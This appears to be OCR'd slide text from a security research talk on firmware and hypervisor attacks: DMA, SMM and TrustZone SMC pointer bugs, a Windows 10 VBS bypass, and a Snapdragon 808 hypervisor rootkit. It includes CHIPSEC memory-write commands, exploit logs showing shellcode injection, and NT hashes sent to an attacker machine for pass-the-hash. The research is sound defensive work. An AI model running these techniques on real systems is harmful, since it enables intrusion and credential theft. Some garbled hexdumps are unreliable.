|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------|-------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------|
| 00006C08800<br>00006C08800<br>00006C08800<br>00006C08800 E8 F9 FF 17                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             | loc_6C08800      | В                                                                                   | ; DATA XREF: start<br>; LOAD:off_6C00228<br>loc_6C06FA0                                                                                                                               |                      |
| 00006C08800         00006C08804       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00       00 <t< th=""><th>loc_6C08890<br/>;</th><th>ALIGN 0x80<br/>STP<br/>MOV<br/>BL<br/>LDP<br/>B<br/>ALIGN 0x80<br/>STP<br/>MOV<br/>BL<br/>LDP</th><th>X30, X0, [SP,#-0x10]!<br/>X0, #9<br/>sub_6C00FDC<br/>X30, X0, [SP],#0x10<br/>; CODE XREF: LOAD:<br/>loc_6C08890<br/>X30, X0, [SP,#-0x10]!<br/>X0, #0xA<br/>sub_6C00FDC<br/>X30, X0, [SP],#0x10</th><th>TTBR0_EL2<br/>Stage 1</th></t<> | loc_6C08890<br>; | ALIGN 0x80<br>STP<br>MOV<br>BL<br>LDP<br>B<br>ALIGN 0x80<br>STP<br>MOV<br>BL<br>LDP | X30, X0, [SP,#-0x10]!<br>X0, #9<br>sub_6C00FDC<br>X30, X0, [SP],#0x10<br>; CODE XREF: LOAD:<br>loc_6C08890<br>X30, X0, [SP,#-0x10]!<br>X0, #0xA<br>sub_6C00FDC<br>X30, X0, [SP],#0x10 | TTBR0_EL2<br>Stage 1 |
| 00006C08910<br>00006C08910                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       | loc_6C08910      |                                                                                     | ; CODE XREF: LOAD:                                                                                                                                                                    | Translation table    |
| LOAD:000000006C014E0 80 D8 A0 D2<br>Load:00000006C014E4 40 17 00 14                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |                  |                                                                                     | MOV X0, #0x6C40000<br>B loc_6C071E4                                                                                                                                                   |                      |
| LOAD:00000006C071E4<br>LOAD:00000006C071E4 00 20 1C D5<br>LOAD:00000006C071E8 80 01 00 58<br>LOAD:00000006C071EC 00 A2 1C D5<br>LOAD:00000006C071F0 80 01 00 58<br>LOAD:00000006C071F4 40 20 1C D5<br>LOAD:00000006C071F8 C0 03 5F D6<br>LOAD:00000006C071F8                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     |                  | CO71E4<br>MSR<br>LDR<br>MSR<br>LDR<br>MSR<br>RET<br>OF FUNCTION CHU                 | ; CODE XREF:<br>#4, c2,  c0, #0, X0<br>X0, =0xBB04FF44<br>#4, c10, c2, #0, X0<br>X0, =0x80803A20<br>#4, c2, c0, #2, X0                                                                |                      |

#### Firmware and Hypervisor Attack Vectors

# THERE IS ALWAYS A WAY...

mafilip.com

#### **Run-time Attack Vectors in X86**



#### Attack Vectors in modern ARMv8 SoC



Additional reading: awesome work on exploiting TrustZone by Gal Beniamini of P0 [1], [2], [3], [4]

#### **DMA** attack

- Injects UEFI DXE driver into the target system using preboot DMA attack by d\_olex [1]
- If memory protection (IOMMU) not set attacker may read/write arbitrary memory (including UEFI boot service table)
- DMA also can be runtime attacks, using for example PCILeech to compromise OS (for example though run-time UEFI service table by Alex lonescu [2])

#### 

#### **Integrated Graphics DMA: Overview**



#### Using igd command for DMA access

#### # chipsec\_util.py igd

```
[CHIPSEC] Executing command 'igd' with args []
```

```
>>> chipsec_util igd
>>> chipsec_util igd dmaread <address> [width] [file_name]
>>> chipsec util igd dmawrite <address> <width> <value|file name>
```

- Cannot access low 1MB legacy address space: 0x0 0xFFFFF
- Can access Graphics Stolen data memory
- Separate graphics VTd engine (controlled by GFXVTBAR)

#### **References:**

Intel Graphics for Linux – Hardware Specification – PRMs

#### **DMA Attacks**



#### **Pointer vulnerabilities**

## Exploiting SMM pointers...



Exploit tricks SMI handler to write to an address in SMRAM (Attacking and Defending BIOS in 2015)

#### Attacking hypervisors via SMM pointers...



Even though SMI handler check pointers for overlap with SMRAM, exploit can trick it to write to VMM protected page (Attacking Hypervisors via Firmware and Hardware)

#### **Pointer Arguments to SMC Handlers**



Some SMC Handlers write result to a buffer at address passed in X2,...

#### **Unchecked Pointer Vulnerabilities**



If SMC handler doesn't validate pointer, it can overwrite TrustZone memory Examples: <u>Full TrustZone exploit for MSM8974</u>, SMC vulns by Dan Rosenberg

#### **SMC Pointer Vulnerabilities Fuzzer**



## **Race Condition Issues (TOCTOU)**



SMC handlers may have TOCTOU issues when reading structures from X2

#### **Unchecked Addresses to MMIO Ranges**



An address to MMIO of a secure device can be passed to SMC handler. If the handler doesn't validate the address it can be tricked to write to the secure device

#### **Unchecked MMIO Pointer Fuzzer for TZ**





#### Pointer overlap vulnerability

## Firmware use of MMIO



#### **MMIO BAR Issue**

Exploit with PCI access can modify BAR register and relocate MMIO range

On SMI interrupt, SMI handler firmware attempts to communicate with device(s)

It may read or write "registers" within relocated MMIO



# **Overlapping SoC Ranges with TrustZone Memory**

- MMIO and core registers may contain addresses to SoC or core ranges/structures
- Example: Debug Buffer, TTBR...
- Overlap range/structure with TrustZone memory and look for unexpected behavior
- Hardware should properly handle overlap condition



#### Virtualization Based Security

#### Windows 10 Virtualization Based Security (VBS)



#### **Example: bypassing Windows 10 VSM**

| 🚆 chipsec, main.py - m poc.vm, lind -a demo - Far 3.0.4400 x64 Administrator 🛛 🚽 🛛                                                                                                               |                                                                                                                                                                                                                                                                                        |
|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| *] running loaded modules                                                                                                                                                                        |                                                                                                                                                                                                                                                                                        |
| <pre>** running module: chipsec.modules.poc.vsm ** Module path: C:\chipsec\chipsec\modules\poc\vsm.pyc ** [ ** Module: Windows 10 Virtualization Based Security Bypass</pre>                     |                                                                                                                                                                                                                                                                                        |
| x][                                                                                                                                                                                              | 🐏 ubuntu-attacker on DEMOPC - Virtual Machine Connection 📃 🗘                                                                                                                                                                                                                           |
| *] Searching for (U)EFI system firmware S3 boot script in physical memory<br>+] Found firmware S3 boot script at 0x000000087C65000                                                               | File Action Media Clipboard View Help                                                                                                                                                                                                                                                  |
| (1) The S3 boot script has been modified. Go to sleep<br>Hypervisor and secure VM memory will be exposed after resume                                                                            |                                                                                                                                                                                                                                                                                        |
| :\chipsec>chipsec_main.py -m poc.vm_find -a demo<br>####################################                                                                                                         | [-] SMB SessionError: STATUS_LOGON_FAILUBE(The attempted logon is invalid. This is either due to a bad username or authentice<br>n information.)<br>Trying pass-the-hash with e46bfef?bbc505f403a0b60f93008fa1                                                                         |
| ## CHIPSEC: Platform Hardware Security Assessment Framework ##<br>##<br>##<br>IM############################                                                                                     | Impacket v0.9.11-dev - Copyright 2002-2015 Core Security Technologies<br>[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentica<br>n information.)                                                              |
| CHIPSEC] Version 1.2.1<br>CHIPSEC] Arguments: -m poc.vm_find -a demo                                                                                                                             | Trying pass-the-hash with e56043e3b005533b4f29abdbZab23726<br>Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies                                                                                                                                                    |
| IARNING: ************************************                                                                                                                                                    | [-] SHB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentic<br>n information.)<br>Trying pass-the-bash with ecfad63aab6fcb5f1758474a8c19446c                                                                          |
| ARNING: It should not be installed/deployed on production end-user systems.<br>ARNING: See WARNING.txt                                                                                           | Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies                                                                                                                                                                                                                  |
| IARNING: ####################################                                                                                                                                                    | [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentic<br>n information.)<br>Trying pass-the-hash with f30cd95c3532307cc7b339ecf9ad7d33<br>Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies |
| CHIPSEC] OS CHIPSEC] OL 2000 AVED04<br>CHIPSEC] Platform: Desktop 4th Generation Core Processor (Haswell CPU / Lynx Point PCH)<br>CHIPSEC] VID: 8086<br>CHIPSEC] DID: 0C00                       | [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentic<br>n information.)<br>Trying pass-the-hash with f53a6b09eddf4c0e099c1f7a6f9c0010                                                                          |
| <pre>+] loaded chipsec.modules.poc.vm_find</pre>                                                                                                                                                 | Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies                                                                                                                                                                                                                  |
| *] running loaded modules                                                                                                                                                                        | [-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentic<br>n information.)<br>Truine user the back with EEE-020050001100401201440672-20                                                                           |
| *] running module: chipsec.modules.poc.vm_find<br>*] Module path: C:\chipsec\chipsec\modules\poc\vm_find.pyc                                                                                     | Trying pass-the-hash with f56a8399599f1be040128b1dd9623c29<br>Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies<br>Type help for list of commands                                                                                                                  |
| *] Module arguments (1):<br>'demo'l                                                                                                                                                              | # shares                                                                                                                                                                                                                                                                               |
| x][ ====================================                                                                                                                                                         | ADMINS<br>CS                                                                                                                                                                                                                                                                           |
| x][ Module: Virtual Machines Analyser<br>x][                                                                                                                                                     | IPC\$<br>NETLOGON                                                                                                                                                                                                                                                                      |
| *] Searching VM VMCS                                                                                                                                                                             | share<br>SYSVOL                                                                                                                                                                                                                                                                        |
| *] Found Virtual Machine with Extended Page Tables Address: 000000000524B01E<br>*] Reading Extended Page Tables at 0x000000000524B01E<br>size: 544 KB, address space: 3019 MB                    | # use share<br># 1s<br>drw-rw-rw- 9 Fri Oct 16 15:29:05 2015 .                                                                                                                                                                                                                         |
| *] Creating Reverse Translation                                                                                                                                                                  | drw-rw-rw-<br>-rw-rw-rw-<br>24 Fri Oct 16 15:29:05 2015 confidential.txt                                                                                                                                                                                                               |
| <ul> <li>Found Virtual Machine with Extended Page Tables Address: 000000004E40301E</li> <li>Reading Extended Page Tables at 0x000000004E40301E<br/>size: 60 KB, address space: 203 MB</li> </ul> | Status: Running                                                                                                                                                                                                                                                                        |
| *] Creating Reverse Translation                                                                                                                                                                  |                                                                                                                                                                                                                                                                                        |
| *] Searching NT Hash in memory                                                                                                                                                                   |                                                                                                                                                                                                                                                                                        |
| <ul><li>*] Found 63 candidates, sending them to attacker machine</li><li>*] Found 1 candidates, sending them to attacker machine</li></ul>                                                       |                                                                                                                                                                                                                                                                                        |
| Search the web and Windows                                                                                                                                                                       | ヘ 17 d) 日 3:10                                                                                                                                                                                                                                                                         |

## Windows SMM Security Mitigations Table (WSMT)

The Windows SMM Security Mitigations Table (WSMT) specification contains details of an Advanced Configuration and Power Interface (ACPI) table that was created for use with Windows operating systems that support Windows virtualization-based security (VBS) features.

This information applies to the following operating systems:

- Windows Server 2016
- Windows 10, version 1607

# **SMC Argument Pointing to Hypervisor**





#### Modifying Hypervisor on Snapdragon 808...

- We find hypervisor binary in memory. Must be a copy?
- Let's try to modify it. The phone reboots! WTF?
- Assumption: stage 2 translation is disabled?

```
[CHIPSEC] reading buffer from memory: PA = 0x00000000006C0000^
44 11 00 58 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
                                                            ([CHIPSEC] Executing command 'mem' with args ['writeval', '0x6C00000', 'dword', '0xFFFFFFF'
64 1c 78 92 63 1c 40 92 63 18 44 aa a4 10 00 58
                                                   dxc@c
00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
                                                             [CHIPSEC] writing 4-byte value 0xFFFFFFFF to PA 0x000000006C00000..
                                                             [CHIPSEC] (mem) time elapsed 0.001
f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78
                                                             root@bullhead:/sdcard/t3 # python chipsec util.py mem read 0x6C00000
00 1c 40 92 00 18 42 aa d1 03 00 94 a0 00 3c
                                                     0
f7 0b 00 94 1f 00 00 f1 e0 01 00 54 20 40
a0 00 3c d5 01 1c 78 92 00 1c 40 92 00 18 41 aa
                                                     <
                                                         X
01 00 80 d2 79 0e 00 94 a0 00 3c d5 20 0c 00 94
                                                       V
                                                                CHIPSEC: Platform Hardware Security Assessment Framework
1f 00 00 f1 80 00 00 54 e1 03 00 aa e2 7f c1 a8
02 00 00 14 e2 07 c1 a8 f4 03 02 aa 60 00
                                          80 d2
                                                             00 el lc d5 e0 03 lf aa 60 e0 lc d5 60 ll lc d5
                                                              CHIPSEC] Version 1.2.2
e0 7f 86 d2 40 11 1c d5 3f 04 00 f1 c0 00
                                                       (d
3f 08 00 f1 40 00 00 54 00 00 00
                                 14
                                    04
                                                       0
                                                             ****** Chipsec Linux Kernel module is licensed under GPL 2.0
05 00 00 14 00 10 38 d5 00 00 7b b2 00 10 18 d5
                                                         8
e4 03 1f aa 04 11 1c d5 9f 00 61 f2 01 01 00 54
                                                             [CHIPSEC] Executing command 'mem' with args ['read', '0x6C00000']
20 40 3c d5 1f 00 40 f2 61 00 00 54 60 12 80 d2
                                                    0<
                                                         0 a
                                                             [CHIPSEC] reading buffer from memory: PA = 0x000000006C00000
                                                                                                                        len = 0 \times 100..
[CHIPSEC] (mem) time elapsed 0.014
                                                             ff ff ff ff 04 c0 1c d5 20 40 1c d5 a3 00 3c d5
root@bullhead:/sdcard/t3 #
                                                                     92 63 1c 40 92 63 18 44 aa a4 10 00 58
                                                                                                            dxc
                                                            00 00 82 d2 00 7c 03 9b 9f 60 20 cb f4 4f bf a9
                                                                                                                        0
                                                             f3 03 03 aa e2 07 bf a9 a0 00 3c d5 02 1c 78 92
                                                            00 lc 40 92 00 18 42 aa dl 03 00 94 a0 00 3c d5
```

#### Now we can patch the hypervisor...



#### **Patching EL2 Vector Table**



#### **PoC Exploit App and Hypervisor Patch**

- Exploit app stores some magic number and command in a memory
- Hypervisor rootkit read magic number and executes command
- For example, command "Expose EL1 kernel memory at address X"

#### **Exploit Details**

bullhead:/ # /su/expl.sh chipsec 6843 0 [CHIPSEC] OS : Linux 3.10.73-gb1bd207-dirty #1 SMP PREEMPT Mon Jun 26 16:11:07 PDT [CHIPSEC] Platform: aarch64

[+] loaded chipsec.modules.tools.hyp.hyp\_exploit

[\*] running module: chipsec.modules.tools.hyp.hyp exploit [x][ Module: Patching the hypervisor [Exploit] Check Hypervisor memory at address : 0x06C00000 44 11 00 58 04 c0 1c d5 20 40 1c d5 a3 00 3c d5 | D X @ < 64 1 c 78 92 63 1 c 40 92 63 18 44 aa a4 10 00 58 | d x c @ c D X [Exploit] EL1 kernel module has access to Hypervisor memory [Exploit] Read VBAR EL2 with address of Hyp Vector Table : 0x06C08800 [Exploit] Find a Exception Handler function in which exploit will inject Shellcode [Exploit] Target Function Address : 0x06C017FC [Exploit] Prepare Shellcode with Commands : Read/Write EL1 Kernel memory

[Exploit] Inject Shellcode to Target Function in address : 0x06C019F8
[Exploit] Check Shellcode after injection : PASS

#### **Exploit Details**

bullhead:/ # /su/chipsec util.sh mem read 0x80000 chipsec 6843 0 10 00 00 14 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 52 4d 64 00 00 ARMd 00 00 f5 03 00 aa ef ff 05 94 71 00 06 94 15 00 06 94 q 16 00 38 d5 e0 03 16 aa 7a 00 06 94 f7 03 8 Ζ 00 aa G ; X 17 01 00 b4 20 00 00 94 47 00 00 94 3b 05 00 58 9e 02 00 10 ec 0a 40 f9 8c 01 1c 8b 80 01 1f d6 (d 1f 20 03 d5 ff ff ff 17 1f 20 03 d5 20 03 d5 1f 20 03 d5 1f 20 03 d5 1f 20 03 d5 1f 20 03 d5 20 03 1f 20 03 d5 1f 20 03 d5 1f d5 20 03 d5 c5 10 00 58 05 c0 18 d5 19 20 18 20 Х d5 Зa 18 d5 df 3f 03 d5 01 00 00 14 00 10 18 d5 ? df 3f 03 d5 60 03 1f d6 bf 0a 40 f2 01 01 00 54 bf 02 18 eb (d cb 00 00 54 00 00 a4 d2 00 00 18 8b bf 02 00 eb [CHIPSEC] (mem) time elapsed 0.003

bullhead:/ # [APP] Got signal from the Hypervisor! [APP] Hooked interrupt executed [APP] Address in Android kernel to read through [APP] hooked Hypervisor interrupt is: 0x80000 [APP] Kernel Memory Dump: 00 00 00 00 00 00 00 00 00 00 00 00 00 41 52 4D 64 00 00 00 00 F5 03 00 AA EF FF 05 94 71 00 06 94 15 00 06 94 16 00 38 D5 E0 03 16 AA 7A 00 06 94 F7 03 17 01 00 B4 20 00 00 94 47 00 00 94 40 F9 9E 02 00 10 EC 0A 8C 01 1 C 8B 80 01 1F 20 03 D5 FF FF FF 17 1F 20 03 D5 C5 10 00 58 05 C0 18 D5 19 20 18 D5 3A 20 18 D5 DF 3F 03 D5 01 00 00 14 00 10 18 D5 DF 3F 03 D5 60 03 1F D6 BF 0A 40 F2 01 01 00 54 BF 02 18 EB CB 00 00 54 00 00 A4 D2 00 00 18 8B BF 02 00 EB

User mode application can read EL2 kernel memory from 0x80000 physical address using our hyp patch

#### This has been fixed in Google Pixel

- The trust model has changed on Snapdragon 821 SoC
- EL1 (kernel) is not longer in the TCB of EL2 (hypervisor)
- Hypervisor is no longer accessible from Android kernel (EL1)

```
python chipsec_util.py mem read 0x85810000
##
                                                ##
   CHIPSEC: Platform Hardware Security Assessment Framework
##
                                                ##
##
                                                ##
[CHIPSEC] Version 1.2.2
****** Chipsec Linux Kernel module is licensed under GPL 2.0
[CHIPSEC] Executing command 'mem' with args ['read', '0x85810000']
[CHIPSEC] reading buffer from memory: PA = 0 \times 0000000085810000, len = 0 \times 100.
user@kli:~$ adb shell
```

<

#### **Cannot use SMC handler either**

- Passing hypervisor address in the SMC argument
- Return error result
- SMC does not allow overwriting hypervisor memory on behalf of EL1

#### Conclusion

- Increase awareness of architecture and unpatched vulnerabilities
- Software should properly use HW in order to avoid integration bugs
- Many vendors not patched systems for known firmware vulnerabilities
- Similarities between vectors of attacks on x86 and ARM exist and security architectures can learn from each other

#### Thank You!